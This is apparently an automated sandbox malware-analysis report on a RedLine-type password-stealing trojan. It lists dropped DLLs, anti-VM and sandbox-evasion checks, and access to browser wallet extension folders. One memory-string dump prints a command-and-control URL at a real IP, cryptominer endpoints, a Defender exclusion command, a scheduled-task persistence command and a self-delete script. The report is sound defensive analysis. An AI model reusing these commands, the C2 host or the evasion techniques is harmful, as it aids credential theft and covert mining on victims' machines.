Unpacked PE file: 9.2.CAFIJKFHIJ.exe.d00000.0.unpack .text:ER;.rsrc:R; vs Unknown_Section0:ER;Unknown_Section1:R;

Binary contains a suspicious time stamp

Source: CAFIJKFHIJ.exe.3.dr

Static PE information: 0x96C89C2F [Tue Mar 1 06:39:43 2050 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_004185A0

PE file contains sections with non-standard names

Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: sqln[1].dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F9490D push ecx; ret	0_2_00F94920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F61A80 push ecx; ret	0_2_00F61A93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A4E5 push ecx; ret	3_2_0041A4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C82B536 push ecx; ret	3_2_6C82B549
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB1FAA pushfd ; ret	9_2_00007FFD9BAB1FB0
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB8A21 push es; iretd	9_2_00007FFD9BAB8A24
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB1D85 pushfd ; ret	9_2_00007FFD9BAB1D8B
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB8DD8 push edx; retf	9_2_00007FFD9BAB8DDB
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB113D pushfd ; ret	9_2_00007FFD9BAB1143
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BBF3D44 push ebx; ret	9_2_00007FFD9BBF3D4E

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CAFIJKFHIJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CAFIJKFHIJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004185A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CAFIJKFHIJ.exe PID: 5744, type: MEMORYSTR

High number of junk calls founds (likely related to sandbox DOS / API hammering)

Source: Global behavior

Junk call stats: NtWriteFile 2314752

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\ProgramData\CAFIJKFHIJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PortConnector WHERE PNPDeviceID IS NOT NULL
Source: C:\ProgramData\CAFIJKFHIJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PortConnector WHERE PNPDeviceID IS NOT NULL

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\CAFIJKFHIJ.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, RegAsm.exe, CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLCMDVRT32.DLLCMDVRT64.DLLSXIN.DLLCUCKOOMON.DLLKERNEL32.DLLWINE_GET_UNIX_FILE_NAMESELECT * FROM WIN32_COMPUTERSYSTEMMANUFACTURERMODELMICROSOFT CORPORATIONVIRTUALVMWAREBALLOON.NETKVM.VIOINPUTVIOFS.VIOSER.VMBUSVMBUSHIDHYPERKBDJOHN DOEMILLERMALWARECURRENTUSERSANDBOXJOHNSONWDAGUTILITYACCOUNTVBOXMOUSE.VBOXGUEST.VBOXSF.VBOXVIDEO.VMMOUSE.VBOXOGL.DLLVMWAREORACLEVIRTUALBOX GUEST ADDITIONSVBOXSERVICEVGAUTHSERVICEVMUSRVCQEMU-GASELECT FROM WIN32_PORTCONNECTOR WHERE PNPDEVICEID IS NOT NULLPNPDEVICEIDACPI\PNP0501ACPI\PNP0502SYSCRITICAL ERROR1POWERSHELLRUNAS -COMMAND ADD-MPPREFERENCE -EXCLUSIONPATH '{0}'ON0\SCREEN.JPGSCREEN\.JPGHASHCUM/GET.PHPPOST15SEC30SECRANDOM/ZIMA.PHP?MINE=IFELSEXMRVERUSXMR+VERUSRAVENETCVERUS+RAVENVERUS+ETCXMR+RAVENXMR+ETCAUTOABCDEFGHJKLMNOWIN32_PROCESSORPROCESSORID-WIN32_BIOSSERIALNUMBERWIN32_DISKDRIVESIGNATUREWIN32_BASEBOARDWIN32_VIDEOCONTROLLERNAMEX20X0000100X0000110X0000120X0000130X0000140X0000150X0000160X0000170X0000180X0000190X0000200X0000210X000022SELECT * FROM WIN32_PROCESSORNUMBEROFCORESPHORMMID.CROOT\CIMV2SELECT NAME FROM WIN32_PROCESSORUNKNOWN.SELECT TOTALPHYSICALMEMORY FROM WIN32_COMPUTERSYSTEMTOTALPHYSICALMEMORYMBSELECT * FROM WIN32_VIDEOCONTROLLERADAPTERRAM BYTES, CAPTION{0} \| {1}AMDNVIDIAINTEL(R){1}.ROOT\SECURITYCENTERROOT\SECURITYCENTER2SELECT * FROM ANTIVIRUSPRODUCTDISPLAYNAME, NONECPUGPURAMTAGIFELSELDAV/BEEP.PHPFILEZIDBEBRIK.PHP.BAT@ECHO OFFTIMEOUT 3 > NULSTART "" ""CD DEL "" /F /QSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\C2NODGFZA3MUZXHL/CREATE /SC MINUTE /MO 3 /TN "" /TR "" /FCMD/C SCHTASKS /CREATE /F /SC MINUTE /MO 5 /RL HIGHEST /TN "/ZIMA.PHP?MINE=LOADER;YESNOSELECT COMMANDLINE FROM WIN32_PROCESS WHERE PROCESSID = COMMANDLINEWIN64UNINSTALL.DATMAZRICY9X3PTU2IZDRO5UXBB6/AK0/HTSOSORRY.PHPEOK.PHPTOKYO.PHPCHECK.PHPOPERAAPP.DATOPERA.DATOPERAUPDATER.DATFIREFOX.DATHELPER.DATZUHAN.EXEWINFORM.CSZUHAN1264417905PROGRAM.CSGETIQZUTSZDJUKE1BSBET3EI2ENPPHHTXRWHVRLTV+QQKRJFXZ5YF6S4CCPXUXRE4GSEXBURQY1IXBJM+H+NKKUXWDRKMSHJJWZCKO9RYTWZ/5ZDYLRQZYZKU1AQMYRJIIC5E1EA04PVRZRO/7AHRKIZQ==YBM4NNGEQQFUIWZVANWG2OKZNBNG1PG7S41+NKV0IE1YLNNXKNDZWHC9OQR3X989TOJKAX+VQZ8J9MEC90WKEDP6JF6K5I0KUS3KC3P7W5HWUIY2VYBMXLVQVOXY4HZSKF6RSY8EDB9JVHITI1OGEBE7LPINPVDCPLNO7BA9H4PUEE1OMVXIBOAXODMCNZYXH2WBLTMBMLYZIYRYS2X1W2SHQJV9MELHOEXPN0WVWTZPMNWFIT4ESVD8KBOQVN+CWZ8WPHFKNLDOXZ9XAOAXJ/WKFJNCKYYTKCLPPN6MQON47QFU6FNCRFJL0WKAJUBTHW2JI1/J5UQNJL+XNNJZXLROMYC3PN0HG+S0I2F7Y4WHXX4HTFFK4TLIGGE9IEHVQFUTXCXGEKIPB3QA29LGSG==[CHECK]HTTP://185.209.162.40/APOCALYPSERUSSIA,GEORGIA,BELARUS,ARMENIA,RUSSIA,BELARUS,AZERBAIJAN,KAZAKHSTAN,KYRGYZSTAN,ARMENIA,UZBEKISTAN,TAJIKISTAN EF+UVD02PT3LWIEMBAG5OW==ONVBC.EXE/ZIMA.PHP?MINE=XMR/ZIMA.PHP?MINE=OTHERGENERATORGENAPZXDATID=APPLICATION/X-WWW-FORM-URLENCODED//REGSVCS.EXE/ZIMA.PHP?MINE=RAVENNGEN.EXE/ZIMA.PHP?MINE=ETC
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\ProgramData\CAFIJKFHIJ.exe	Memory allocated: 18D0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Memory allocated: 1C450000 memory reserve \| memory write watch			Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\ProgramData\CAFIJKFHIJ.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 8.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\ProgramData\CAFIJKFHIJ.exe TID: 2488	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3220	Thread sleep count: 43 > 30			Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\ProgramData\CAFIJKFHIJ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410370 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004104A2h

3_2_00410370

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6A7B3 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F6A7B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040B030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_004011E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_004164A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00417550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_00417140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A980

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

3_2_004168E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410540 GetSystemInfo,wsprintfA,

3_2_00410540

Source: C:\ProgramData\CAFIJKFHIJ.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2069666792.000000002537B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SystemHostDiagnostic Service HostWdiServiceHostWindows Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup Engine ServicewbengineWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmictimesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Re
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmouse.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys@n
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys@n
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxSF.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service0
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000161B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000161B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.sys
